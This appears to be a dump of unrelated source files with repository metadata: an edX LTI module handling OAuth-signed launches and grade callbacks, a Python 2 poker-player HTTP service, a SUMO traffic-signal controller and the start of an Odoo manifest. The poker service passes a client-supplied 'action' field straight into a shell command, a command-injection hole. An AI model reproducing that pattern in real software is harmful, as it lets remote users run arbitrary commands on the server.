target="ltiLaunchFrame-${element_id}"
encType="application/x-www-form-urlencoded"
>
<input name="launch_presentation_return_url" value="" />
<input name="lis_outcome_service_url" value="" />
<input name="lis_result_sourcedid" value="" />
<input name="lti_message_type" value="basic-lti-launch-request" />
<input name="lti_version" value="LTI-1p0" />
<input name="oauth_callback" value="about:blank" />
<input name="oauth_consumer_key" value="${oauth_consumer_key}" />
<input name="oauth_nonce" value="${oauth_nonce}" />
<input name="oauth_signature_method" value="HMAC-SHA1" />
<input name="oauth_timestamp" value="${oauth_timestamp}" />
<input name="oauth_version" value="1.0" />
<input name="user_id" value="${user_id}" />
<input name="role" value="student" />
<input name="oauth_signature" value="${oauth_signature}" />
<input name="custom_1" value="${custom_param_1_value}" />
<input name="custom_2" value="${custom_param_2_value}" />
<input name="custom_..." value="${custom_param_..._value}" />
<input type="submit" value="Press to Launch" />
</form>
5. LTI provider has same secret key and it signs data string via *OAuth1* and compares signatures.
If signatures are correct, LTI provider redirects iframe source to LTI tool web page,
and LTI tool is rendered to iframe inside course.
Otherwise error message from LTI provider is generated.
"""
js = {
'js': [
resource_string(__name__, 'js/src/lti/lti.js')
]
}
css = {'scss': [resource_string(__name__, 'css/lti/lti.scss')]}
js_module_name = "LTI"
def get_input_fields(self):
# LTI provides a list of default parameters that might be passed as
# part of the POST data. These parameters should not be prefixed.
# Likewise, The creator of an LTI link can add custom key/value parameters
# to a launch which are to be included with the launch of the LTI link.
# In this case, we will automatically add `custom_` prefix before this parameters.
# See http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html#_Toc316828520
PARAMETERS = [
"lti_message_type",
"lti_version",
"resource_link_title",
"resource_link_description",
"user_image",
"lis_person_name_given",
"lis_person_name_family",
"lis_person_name_full",
"lis_person_contact_email_primary",
"lis_person_sourcedid",
"role_scope_mentor",
"context_type",
"context_title",
"context_label",
"launch_presentation_locale",
"launch_presentation_document_target",
"launch_presentation_css_url",
"launch_presentation_width",
"launch_presentation_height",
"launch_presentation_return_url",
"tool_consumer_info_product_family_code",
"tool_consumer_info_version",
"tool_consumer_instance_guid",
"tool_consumer_instance_name",
"tool_consumer_instance_description",
"tool_consumer_instance_url",
"tool_consumer_instance_contact_email",
]
client_key, client_secret = self.get_client_key_secret()
# parsing custom parameters to dict
custom_parameters = {}
for custom_parameter in self.custom_parameters:
try:
param_name, param_value = [p.strip() for p in custom_parameter.split('=', 1)]
except ValueError:
_ = self.runtime.service(self, "i18n").ugettext
msg = _('Could not parse custom parameter: {custom_parameter}. Should be "x=y" string.').format(
custom_parameter="{0!r}".format(custom_parameter)
)
raise LTIError(msg)
# LTI specs: 'custom_' should be prepended before each custom parameter, as pointed in link above.
if param_name not in PARAMETERS:
param_name = 'custom_' + param_name
custom_parameters[six.text_type(param_name)] = six.text_type(param_value)
return self.oauth_params(
custom_parameters,
client_key,
client_secret,
)
def get_context(self):
"""
Returns a context.
"""
# use bleach defaults. see https://github.com/jsocol/bleach/blob/master/bleach/__init__.py
# ALLOWED_TAGS are
# ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code', 'em', 'i', 'li', 'ol', 'strong', 'ul']
#
# ALLOWED_ATTRIBUTES are
# 'a': ['href', 'title'],
# 'abbr': ['title'],
# 'acronym': ['title'],
#
# This lets all plaintext through.
sanitized_comment = bleach.clean(self.score_comment)
return {
'input_fields': self.get_input_fields(),
# These parameters do not participate in OAuth signing.
'launch_url': self.launch_url.strip(),
'element_id': self.location.html_id(),
'element_class': self.category,
'open_in_a_new_page': self.open_in_a_new_page,
'display_name': self.display_name,
'form_url': self.runtime.handler_url(self, 'preview_handler').rstrip('/?'),
'hide_launch': self.hide_launch,
'has_score': self.has_score,
'weight': self.weight,
'module_score': self.module_score,
'comment': sanitized_comment,
'description': self.description,
'ask_to_send_username': self.ask_to_send_username,
'ask_to_send_email': self.ask_to_send_email,
'button_text': self.button_text,
'accept_grades_past_due': self.accept_grades_past_due,
}
def get_html(self):
"""
Renders parameters to template.
"""
return self.system.render_template('lti.html', self.get_context())
@XBlock.handler
def preview_handler(self, _, __):
"""
This is called to get context with new oauth params to iframe.
"""
template = self.system.render_template('lti_form.html', self.get_context())
return Response(template, content_type='text/html')
def get_user_id(self):
user_id = self.runtime.anonymous_student_id
assert user_id is not None
return six.text_type(six.moves.urllib.parse.quote(user_id))
def get_outcome_service_url(self, service_name="grade_handler"):
"""
Return URL for storing grades.
To test LTI on sandbox we must use http scheme.
While testing locally and on Jenkins, mock_lti_server use http.referer
to obtain scheme, so it is ok to have http(s) anyway.
The scheme logic is handled in lms/lib/xblock/runtime.py
"""
return self.runtime.handler_url(self, service_name, thirdparty=True).rstrip('/?')
def get_resource_link_id(self):
"""
This is an opaque unique identifier that the TC guarantees will be unique
within the TC for every placement of the link.
If the tool / activity is placed multiple times in the same context,
each of those placements will be distinct.
This value will also change if the item is exported from one system or
context and imported into another system or context.
This parameter is required.
Example: u'edx.org-i4x-2-3-lti-31de800015cf4afb973356dbe81496df'
Hostname, edx.org,
makes resource_link_id change on import to another system.
Last part of location, location.name - 31de800015cf4afb973356dbe81496df,
is random hash, updated by course_id,
this makes resource_link_id unique inside single course.
First part of location is tag-org-course-category, i4x-2-3-lti.
Location.name itself does not change on import to another course,
but org and course_id change.
So together with org and course_id in a form of
i4x-2-3-lti-31de800015cf4afb973356dbe81496df this part of resource_link_id:
makes resource_link_id to be unique among courses inside same system.
"""
return six.text_type(six.moves.urllib.parse.quote("{}-{}".format(self.system.hostname, self.location.html_id())))
def get_lis_result_sourcedid(self):
"""
This field contains an identifier that indicates the LIS Result Identifier (if any)
associated with this launch. This field identifies a unique row and column within the
TC gradebook. This field is unique for every combination of context_id / resource_link_id / user_id.
This value may change for a particular resource_link_id / user_id from one launch to the next.
The TP should only retain the most recent value for this field for a particular resource_link_id / user_id.
This field is generally optional, but is required for grading.
"""
return "{context}:{resource_link}:{user_id}".format(
context=six.moves.urllib.parse.quote(self.context_id),
resource_link=self.get_resource_link_id(),
user_id=self.get_user_id()
)
def get_course(self):
"""
Return course by course id.
"""
return self.descriptor.runtime.modulestore.get_course(self.course_id)
@property
def context_id(self):
"""
Return context_id.
context_id is an opaque identifier that uniquely identifies the context (e.g., a course)
that contains the link being launched.
"""
return text_type(self.course_id)
@property
def role(self):
"""
Get system user role and convert it to LTI role.
"""
roles = {
'student': u'Student',
'staff': u'Administrator',
'instructor': u'Instructor',
}
return roles.get(self.system.get_user_role(), u'Student')
def oauth_params(self, custom_parameters, client_key, client_secret):
"""
Signs request and returns signature and OAuth parameters.
`custom_paramters` is dict of parsed `custom_parameter` field
`client_key` and `client_secret` are LTI tool credentials.
Also *anonymous student id* is passed to template and therefore to LTI provider.
"""
client = oauthlib.oauth1.Client(
client_key=text_type(client_key),
client_secret=text_type(client_secret)
)
# Must have parameters for correct signing from LTI:
body = {
u'user_id': self.get_user_id(),
u'oauth_callback': u'about:blank',
u'launch_presentation_return_url': '',
u'lti_message_type': u'basic-lti-launch-request',
u'lti_version': 'LTI-1p0',
u'roles': self.role,
# Parameters required for grading:
u'resource_link_id': self.get_resource_link_id(),
u'lis_result_sourcedid': self.get_lis_result_sourcedid(),
u'context_id': self.context_id,
}
if self.has_score:
body.update({
u'lis_outcome_service_url': self.get_outcome_service_url()
})
self.user_email = ""
self.user_username = ""
# Username and email can't be sent in studio mode, because the user object is not defined.
# To test functionality test in LMS
if callable(self.runtime.get_real_user):
real_user_object = self.runtime.get_real_user(self.runtime.anonymous_student_id)
try:
self.user_email = real_user_object.email
except AttributeError:
self.user_email = ""
try:
self.user_username = real_user_object.username
except AttributeError:
self.user_username = ""
if self.ask_to_send_username and self.user_username:
body["lis_person_sourcedid"] = self.user_username
if self.ask_to_send_email and self.user_email:
body["lis_person_contact_email_primary"] = self.user_email
# Appending custom parameter for signing.
body.update(custom_parameters)
headers = {
# This is needed for body encoding:
'Content-Type': 'application/x-www-form-urlencoded',
}
try:
__, headers, __ = client.sign(
six.text_type(self.launch_url.strip()),
http_method=u'POST',
body=body,
headers=headers)
except ValueError: # Scheme not in url.
# https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136
# Stubbing headers for now:
log.info(
u"LTI module %s in course %s does not have oauth parameters correctly configured.",
self.location,
self.location.course_key,
)
headers = {
u'Content-Type': u'application/x-www-form-urlencoded',
u'Authorization': u'OAuth oauth_nonce="80966668944732164491378916897", \
oauth_timestamp="1378916897", oauth_version="1.0", oauth_signature_method="HMAC-SHA1", \
oauth_consumer_key="", oauth_signature="frVp4JuvT1mVXlxktiAUjQ7%2F1cw%3D"'}
params = headers['Authorization']
# Parse headers to pass to template as part of context:
params = dict([param.strip().replace('"', '').split('=') for param in params.split(',')])
params[u'oauth_nonce'] = params[u'OAuth oauth_nonce']
del params[u'OAuth oauth_nonce']
# oauthlib encodes signature with
# 'Content-Type': 'application/x-www-form-urlencoded'
# so '='' becomes '%3D'.
# We send form via browser, so browser will encode it again,
# So we need to decode signature back:
params[u'oauth_signature'] = six.moves.urllib.parse.unquote(params[u'oauth_signature']).decode('utf8')
# Add LTI parameters to OAuth parameters for sending in form.
params.update(body)
return params
@XBlock.handler
def grade_handler(self, request, suffix): # pylint: disable=unused-argument
"""
This is called by courseware.module_render, to handle an AJAX call.
Used only for grading. Returns XML response.
Example of request body from LTI provider::
<?xml version = "1.0" encoding = "UTF-8"?>
<imsx_POXEnvelopeRequest xmlns = "some_link (may be not required)">
<imsx_POXHeader>
<imsx_POXRequestHeaderInfo>
<imsx_version>V1.0</imsx_version>
<imsx_messageIdentifier>528243ba5241b</imsx_messageIdentifier>
</imsx_POXRequestHeaderInfo>
</imsx_POXHeader>
<imsx_POXBody>
<replaceResultRequest>
<resultRecord>
<sourcedGUID>
<sourcedId>feb-123-456-2929::28883</sourcedId>
</sourcedGUID>
<result>
<resultScore>
<language>en-us</language>
<textString>0.4</textString>
</resultScore>
</result>
</resultRecord>
</replaceResultRequest>
</imsx_POXBody>
</imsx_POXEnvelopeRequest>
Example of correct/incorrect answer XML body:: see response_xml_template.
"""
response_xml_template = textwrap.dedent("""\
<?xml version="1.0" encoding="UTF-8"?>
<imsx_POXEnvelopeResponse xmlns = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0">
<imsx_POXHeader>
<imsx_POXResponseHeaderInfo>
<imsx_version>V1.0</imsx_version>
<imsx_messageIdentifier>{imsx_messageIdentifier}</imsx_messageIdentifier>
<imsx_statusInfo>
<imsx_codeMajor>{imsx_codeMajor}</imsx_codeMajor>
<imsx_severity>status</imsx_severity>
<imsx_description>{imsx_description}</imsx_description>
<imsx_messageRefIdentifier>
</imsx_messageRefIdentifier>
</imsx_statusInfo>
</imsx_POXResponseHeaderInfo>
</imsx_POXHeader>
<imsx_POXBody>{response}</imsx_POXBody>
</imsx_POXEnvelopeResponse>
""")
# Returns when `action` is unsupported.
# Supported actions:
# - replaceResultRequest.
unsupported_values = {
'imsx_codeMajor': 'unsupported',
'imsx_description': 'Target does not support the requested operation.',
'imsx_messageIdentifier': 'unknown',
'response': ''
}
# Returns if:
# - past due grades are not accepted and grade is past due
# - score is out of range
# - can't parse response from TP;
# - can't verify OAuth signing or OAuth signing is incorrect.
failure_values = {
'imsx_codeMajor': 'failure',
'imsx_description': 'The request has failed.',
'imsx_messageIdentifier': 'unknown',
'response': ''
}
if not self.accept_grades_past_due and self.is_past_due():
failure_values['imsx_description'] = "Grade is past due"
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
try:
imsx_messageIdentifier, sourcedId, score, action = self.parse_grade_xml_body(request.body)
except Exception as e:
error_message = "Request body XML parsing error: " + escape(text_type(e))
log.debug("[LTI]: " + error_message)
failure_values['imsx_description'] = error_message
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
# Verify OAuth signing.
try:
self.verify_oauth_body_sign(request)
except (ValueError, LTIError) as e:
failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier)
error_message = "OAuth verification error: " + escape(text_type(e))
failure_values['imsx_description'] = error_message
log.debug("[LTI]: " + error_message)
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
real_user = self.system.get_real_user(six.moves.urllib.parse.unquote(sourcedId.split(':')[-1]))
if not real_user: # that means we can't save to database, as we do not have real user id.
failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier)
failure_values['imsx_description'] = "User not found."
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
if action == 'replaceResultRequest':
self.set_user_module_score(real_user, score, self.max_score())
values = {
'imsx_codeMajor': 'success',
'imsx_description': 'Score for {sourced_id} is now {score}'.format(sourced_id=sourcedId, score=score),
'imsx_messageIdentifier': escape(imsx_messageIdentifier),
'response': '<replaceResultResponse/>'
}
log.debug("[LTI]: Grade is saved.")
return Response(response_xml_template.format(**values), content_type="application/xml")
unsupported_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier)
log.debug("[LTI]: Incorrect action.")
return Response(response_xml_template.format(**unsupported_values), content_type='application/xml')
@classmethod
def parse_grade_xml_body(cls, body):
"""
Parses XML from request.body and returns parsed data
XML body should contain nsmap with namespace, that is specified in LTI specs.
Returns tuple: imsx_messageIdentifier, sourcedId, score, action
Raises Exception if can't parse.
"""
lti_spec_namespace = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0"
namespaces = {'def': lti_spec_namespace}
data = body.strip().encode('utf-8')
parser = etree.XMLParser(ns_clean=True, recover=True, encoding='utf-8')
root = etree.fromstring(data, parser=parser)
imsx_messageIdentifier = root.xpath("//def:imsx_messageIdentifier", namespaces=namespaces)[0].text or ''
sourcedId = root.xpath("//def:sourcedId", namespaces=namespaces)[0].text
score = root.xpath("//def:textString", namespaces=namespaces)[0].text
action = root.xpath("//def:imsx_POXBody", namespaces=namespaces)[0].getchildren()[0].tag.replace('{' + lti_spec_namespace + '}', '')
# Raise exception if score is not float or not in range 0.0-1.0 regarding spec.
score = float(score)
if not 0 <= score <= 1:
raise LTIError('score value outside the permitted range of 0-1.')
return imsx_messageIdentifier, sourcedId, score, action
def verify_oauth_body_sign(self, request, content_type='application/x-www-form-urlencoded'):
"""
Verify grade request from LTI provider using OAuth body signing.
Uses http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html::
This specification extends the OAuth signature to include integrity checks on HTTP request bodies
with content types other than application/x-www-form-urlencoded.
Arguments:
request: DjangoWebobRequest.
Raises:
LTIError if request is incorrect.
"""
client_key, client_secret = self.get_client_key_secret()
headers = {
'Authorization': six.text_type(request.headers.get('Authorization')),
'Content-Type': content_type,
}
sha1 = hashlib.sha1()
sha1.update(request.body)
oauth_body_hash = base64.b64encode(sha1.digest())
oauth_params = signature.collect_parameters(headers=headers, exclude_oauth_signature=False)
oauth_headers = dict(oauth_params)
oauth_signature = oauth_headers.pop('oauth_signature')
mock_request_lti_1 = mock.Mock(
uri=six.text_type(six.moves.urllib.parse.unquote(self.get_outcome_service_url())),
http_method=six.text_type(request.method),
params=list(oauth_headers.items()),
signature=oauth_signature
)
mock_request_lti_2 = mock.Mock(
uri=six.text_type(six.moves.urllib.parse.unquote(request.url)),
http_method=six.text_type(request.method),
params=list(oauth_headers.items()),
signature=oauth_signature
)
if oauth_body_hash != oauth_headers.get('oauth_body_hash'):
log.error(
"OAuth body hash verification failed, provided: {}, "
"calculated: {}, for url: {}, body is: {}".format(
oauth_headers.get('oauth_body_hash'),
oauth_body_hash,
self.get_outcome_service_url(),
request.body
)
)
raise LTIError("OAuth body hash verification is failed.")
if (not signature.verify_hmac_sha1(mock_request_lti_1, client_secret) and not
signature.verify_hmac_sha1(mock_request_lti_2, client_secret)):
log.error("OAuth signature verification failed, for "
"headers:{} url:{} method:{}".format(
oauth_headers,
self.get_outcome_service_url(),
six.text_type(request.method)
))
raise LTIError("OAuth signature verification has failed.")
def get_client_key_secret(self):
"""
Obtains client_key and client_secret credentials from current course.
"""
course = self.get_course()
for lti_passport in course.lti_passports:
try:
lti_id, key, secret = [i.strip() for i in lti_passport.split(':')]
except ValueError:
_ = self.runtime.service(self, "i18n").ugettext
msg = _('Could not parse LTI passport: {lti_passport}. Should be "id:key:secret" string.').format(
lti_passport='{0!r}'.format(lti_passport)
)
raise LTIError(msg)
if lti_id == self.lti_id.strip():
return key, secret
return '', ''
def is_past_due(self):
"""
Is it now past this problem's due date, including grace period?
"""
due_date = self.due # pylint: disable=no-member
if self.graceperiod is not None and due_date: # pylint: disable=no-member
close_date = due_date + self.graceperiod # pylint: disable=no-member
else:
close_date = due_date
return close_date is not None and datetime.datetime.now(UTC) > close_date
class LTIDescriptor(LTIFields, MetadataOnlyEditingDescriptor, EmptyDataRawDescriptor):
"""
Descriptor for LTI Xmodule.
"""
def max_score(self):
return self.weight if self.has_score else None
module_class = LTIModule
resources_dir = None
grade_handler = module_attr('grade_handler')
preview_handler = module_attr('preview_handler')
lti_2_0_result_rest_handler = module_attr('lti_2_0_result_rest_handler')
clear_user_module_score = module_attr('clear_user_module_score')
get_outcome_service_url = module_attr('get_outcome_service_url')
|
jolyonb/edx-platform
|
common/lib/xmodule/xmodule/lti_module.py
|
Python
|
agpl-3.0
| 37,872 | 0.002905 |
import time
import cgi
import json
import os
import BaseHTTPServer
HOST_NAME = 'localhost'
PORT_NUMBER = 9400
class PlayerService(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
action = postvars['action'][0]
w, r = os.popen2("./obj/player " + action)
if 'game_state' in postvars:
game_state = postvars['game_state'][0]
w.write(game_state)
w.close()
response = r.read()
self.wfile.write(response)
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), PlayerService)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
|
rolandkakonyi/poker-player-objc
|
player_service.py
|
Python
|
mit
| 1,447 | 0.002073 |
#!/usr/bin/env python
"""
@file HybridVAControl.py
@author Craig Rafter
@date 19/08/2016
class for fixed time signal control
"""
import signalControl, readJunctionData, traci
from math import atan2, degrees, hypot
import numpy as np
from collections import defaultdict
class HybridVAControl(signalControl.signalControl):
def __init__(self, junctionData, minGreenTime=10., maxGreenTime=60., scanRange=250, packetRate=0.2):
super(HybridVAControl, self).__init__()
self.junctionData = junctionData
self.firstCalled = traci.simulation.getCurrentTime()
self.lastCalled = self.firstCalled
self.lastStageIndex = 0
traci.trafficlights.setRedYellowGreenState(self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString)
self.packetRate = int(1000*packetRate)
self.transition = False
# self.CAMactive = False
# dict[vehID] = [position, heading, velocity, Tdetect]
self.newVehicleInfo = {}
self.oldVehicleInfo = {}
self.scanRange = scanRange
self.jcnPosition = np.array(traci.junction.getPosition(self.junctionData.id))
self.jcnCtrlRegion = self._getJncCtrlRegion()
# print(self.junctionData.id)
# print(self.jcnCtrlRegion)
self.controlledLanes = traci.trafficlights.getControlledLanes(self.junctionData.id)
# dict[laneID] = [heading, shape]
self.laneDetectionInfo = self._getIncomingLaneInfo()
self.stageTime = 0.0
self.minGreenTime = minGreenTime
self.maxGreenTime = maxGreenTime
self.secondsPerMeterTraffic = 0.45
self.nearVehicleCatchDistance = 25
self.extendTime = 1.0 # 5 m in 10 m/s (acceptable journey 1.333)
self.laneInductors = self._getLaneInductors()
self.TIME_MS = self.firstCalled
self.TIME_SEC = 0.001 * self.TIME_MS
'''def minmax(x, lower, upper):
return min(max(x, lower), upper)
'''
def process(self):
self.TIME_MS = traci.simulation.getCurrentTime()
self.TIME_SEC = 0.001 * self.TIME_MS
# Packets sent on this step
# packet delay + only get packets towards the end of the second
if (not self.TIME_MS % self.packetRate) and (not 50 < self.TIME_MS % 1000 < 650):
#self.CAMactive = True
self._getCAMinfo()
# else:
# self.CAMactive = False
# Update stage decisions
# If there's no ITS enabled vehicles present use VA ctrl
numCAVs = len(self.oldVehicleInfo)
isControlInterval = not self.TIME_MS % 1000
#if isControlInterval: print('CTRL')
if numCAVs < 1 and isControlInterval:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('A'+str(self.stageTime))
# If active and on the second, or transition then make stage descision
elif numCAVs >= 1 and isControlInterval:
oncomingVeh = self._getOncomingVehicles()
# If new stage get furthest from stop line whose velocity < 5% speed
# limit and determine queue length
if self.transition:
furthestVeh = self._getFurthestStationaryVehicle(oncomingVeh)
if furthestVeh[0] != '':
meteredTime = self.secondsPerMeterTraffic*furthestVeh[1]
self.stageTime = max(self.minGreenTime, meteredTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
# If we're in this state this should never happen but just in case
else:
self.stageTime = self.minGreenTime
#print('B'+str(self.stageTime))
# If currently staging then extend time if there are vehicles close
# to the stop line
else:
nearestVeh = self._getNearestVehicle(oncomingVeh)
# If a vehicle detected
if nearestVeh != '' and nearestVeh[1] <= self.nearVehicleCatchDistance:
if (self.oldVehicleInfo[nearestVeh[0]][2] != 1e6
and self.oldVehicleInfo[nearestVeh[0]][2] > 1.0/self.secondsPerMeterTraffic):
meteredTime = nearestVeh[1]/self.oldVehicleInfo[nearestVeh[0]][2]
else:
meteredTime = self.secondsPerMeterTraffic*nearestVeh[1]
elapsedTime = 0.001*(self.TIME_MS - self.lastCalled)
Tremaining = self.stageTime - elapsedTime
self.stageTime = elapsedTime + max(meteredTime, Tremaining)
#self.stageTime = max(self.stageTime, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('C'+str(self.stageTime))
# no detectable near vehicle try inductive loop info
elif nearestVeh == '' or nearestVeh[1] > self.nearVehicleCatchDistance:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('D'+str(self.stageTime))
else:
pass
# process stage as normal
else:
pass
# print(self.stageTime)
if isControlInterval:
self.transition = False
if self.transitionObject.active:
# If the transition object is active i.e. processing a transition
pass
# elif (self.TIME_MS - self.firstCalled) < (self.junctionData.offset*1000):
# # Process offset first
# pass
elif (self.TIME_MS - self.lastCalled) < self.stageTime*1000:
# Before the period of the next stage
pass
else:
# Not active, not in offset, stage not finished
if len(self.junctionData.stages) != (self.lastStageIndex)+1:
# Loop from final stage to first stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[self.lastStageIndex+1].controlString)
self.lastStageIndex += 1
else:
# Proceed to next stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[0].controlString)
self.lastStageIndex = 0
#print(self.stageTime)
self.lastCalled = self.TIME_MS
self.transition = True
self.stageTime = 0.0
super(HybridVAControl, self).process()
def _getHeading(self, currentLoc, prevLoc):
dy = currentLoc[1] - prevLoc[1]
dx = currentLoc[0] - prevLoc[0]
if currentLoc[1] == prevLoc[1] and currentLoc[0] == prevLoc[0]:
heading = -1
else:
if dy >= 0:
heading = degrees(atan2(dy, dx))
else:
heading = 360 + degrees(atan2(dy, dx))
# Map angle to make compatible with SUMO heading
if 0 <= heading <= 90:
heading = 90 - heading
elif 90 < heading < 360:
heading = 450 - heading
return heading
def _getJncCtrlRegion(self):
jncPosition = traci.junction.getPosition(self.junctionData.id)
otherJuncPos = [traci.junction.getPosition(x) for x in traci.trafficlights.getIDList() if x != self.junctionData.id]
ctrlRegion = {'N':jncPosition[1]+self.scanRange, 'S':jncPosition[1]-self.scanRange,
'E':jncPosition[0]+self.scanRange, 'W':jncPosition[0]-self.scanRange}
TOL = 10 # Exclusion region around junction boundary
if otherJuncPos != []:
for pos in otherJuncPos:
dx = jncPosition[0] - pos[0]
dy = jncPosition[1] - pos[1]
# North/South Boundary
if abs(dy) < self.scanRange:
if dy < -TOL:
ctrlRegion['N'] = min(pos[1] - TOL, ctrlRegion['N'])
elif dy > TOL:
ctrlRegion['S'] = max(pos[1] + TOL, ctrlRegion['S'])
else:
pass
else:
pass
# East/West Boundary
if abs(dx) < self.scanRange:
if dx < -TOL:
ctrlRegion['E'] = min(pos[0] - TOL, ctrlRegion['E'])
elif dx > TOL:
ctrlRegion['W'] = max(pos[0] + TOL, ctrlRegion['W'])
else:
pass
else:
pass
return ctrlRegion
def _isInRange(self, vehPosition):
distance = np.linalg.norm(vehPosition - self.jcnPosition)
if (distance < self.scanRange
and self.jcnCtrlRegion['W'] <= vehPosition[0] <= self.jcnCtrlRegion['E']
and self.jcnCtrlRegion['S'] <= vehPosition[1] <= self.jcnCtrlRegion['N']):
return True
else:
return False
def _getVelocity(self, vehID, vehPosition, Tdetect):
if vehID in self.oldVehicleInfo.keys():
oldX = np.array(self.oldVehicleInfo[vehID][0])
newX = np.array(vehPosition)
dx = np.linalg.norm(newX - oldX)
dt = Tdetect - self.oldVehicleInfo[vehID][3]
velocity = dx/dt
return velocity
else:
return 1e6
def _getCAMinfo(self):
self.oldVehicleInfo = self.newVehicleInfo.copy()
self.newVehicleInfo = {}
Tdetect = self.TIME_SEC
for vehID in traci.vehicle.getIDList():
vehPosition = traci.vehicle.getPosition(vehID)
if traci.vehicle.getTypeID(vehID) == 'typeITSCV' and self._isInRange(vehPosition):
vehHeading = traci.vehicle.getAngle(vehID)
vehVelocity = self._getVelocity(vehID, vehPosition, Tdetect)
self.newVehicleInfo[vehID] = [vehPosition, vehHeading, vehVelocity, Tdetect]
def _getIncomingLaneInfo(self):
laneInfo = defaultdict(list)
for lane in list(np.unique(np.array(self.controlledLanes))):
shape = traci.lane.getShape(lane)
width = traci.lane.getWidth(lane)
heading = self._getHeading(shape[1], shape[0])
dx = shape[0][0] - shape[1][0]
dy = shape[0][1] - shape[1][1]
if abs(dx) > abs(dy):
roadBounds = ((shape[0][0], shape[0][1] + width), (shape[1][0], shape[1][1] - width))
else:
roadBounds = ((shape[0][0] + width, shape[0][1]), (shape[1][0] - width, shape[1][1]))
laneInfo[lane] = [heading, roadBounds]
return laneInfo
def _getOncomingVehicles(self):
# Oncoming if (in active lane & heading matches oncoming heading &
# is in lane bounds)
activeLanes = self._getActiveLanes()
vehicles = []
for lane in activeLanes:
for vehID in self.oldVehicleInfo.keys():
# If on correct heading pm 10deg
if (np.isclose(self.oldVehicleInfo[vehID][1], self.laneDetectionInfo[lane][0], atol=10)
# If in lane x bounds
and min(self.laneDetectionInfo[lane][1][0][0], self.laneDetectionInfo[lane][1][1][0]) <
self.oldVehicleInfo[vehID][0][0] <
max(self.laneDetectionInfo[lane][1][0][0], self.laneDetectionInfo[lane][1][1][0])
# If in lane y bounds
and min(self.laneDetectionInfo[lane][1][0][1], self.laneDetectionInfo[lane][1][1][1]) <
self.oldVehicleInfo[vehID][0][1] <
max(self.laneDetectionInfo[lane][1][0][1], self.laneDetectionInfo[lane][1][1][1])):
# Then append vehicle
vehicles.append(vehID)
vehicles = list(np.unique(np.array(vehicles)))
return vehicles
def _getActiveLanes(self):
# Get the current control string to find the green lights
stageCtrlString = self.junctionData.stages[self.lastStageIndex].controlString
activeLanes = []
for i, letter in enumerate(stageCtrlString):
if letter == 'G':
activeLanes.append(self.controlledLanes[i])
# Get a list of the unique active lanes
activeLanes = list(np.unique(np.array(activeLanes)))
return activeLanes
def _getLaneInductors(self):
laneInductors = defaultdict(list)
for loop in traci.inductionloop.getIDList():
loopLane = traci.inductionloop.getLaneID(loop)
if loopLane in self.controlledLanes:
laneInductors[loopLane].append(loop)
return laneInductors
def _getFurthestStationaryVehicle(self, vehIDs):
furthestID = ''
maxDistance = -1
speedLimit = traci.lane.getMaxSpeed(self._getActiveLanes()[0])
for ID in vehIDs:
vehPosition = np.array(self.oldVehicleInfo[ID][0])
distance = np.linalg.norm(vehPosition - self.jcnPosition)
if distance > maxDistance and self.oldVehicleInfo[ID][2] < 0.05*speedLimit:
furthestID = ID
maxDistance = distance
return [furthestID, maxDistance]
def _getNearestVehicle(self, vehIDs):
nearestID = ''
minDistance = self.nearVehicleCatchDistance + 1
for ID in vehIDs:
vehPosition = np.array(self.oldVehicleInfo[ID][0])
distance = np.linalg.norm(vehPosition - self.jcnPosition)
if distance < minDistance:
nearestID = ID
minDistance = distance
return [nearestID, minDistance]
def _getLaneDetectTime(self):
activeLanes = self._getActiveLanes()
meanDetectTimePerLane = np.zeros(len(activeLanes))
for i, lane in enumerate(activeLanes):
detectTimes = []
for loop in self.laneInductors[lane]:
detectTimes.append(traci.inductionloop.getTimeSinceDetection(loop))
meanDetectTimePerLane[i] = np.mean(detectTimes)
return meanDetectTimePerLane
|
cbrafter/TRB18_GPSVA
|
codes/sumoAPI/HybridVAControl.py
|
Python
|
mit
| 15,253 | 0.005704 |
# -*- coding: utf-8 -*-
# (c) 2016 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Partner Contact Birthdate Age",
'version': '8.0.1.1.0',
'license': "AGPL-3",
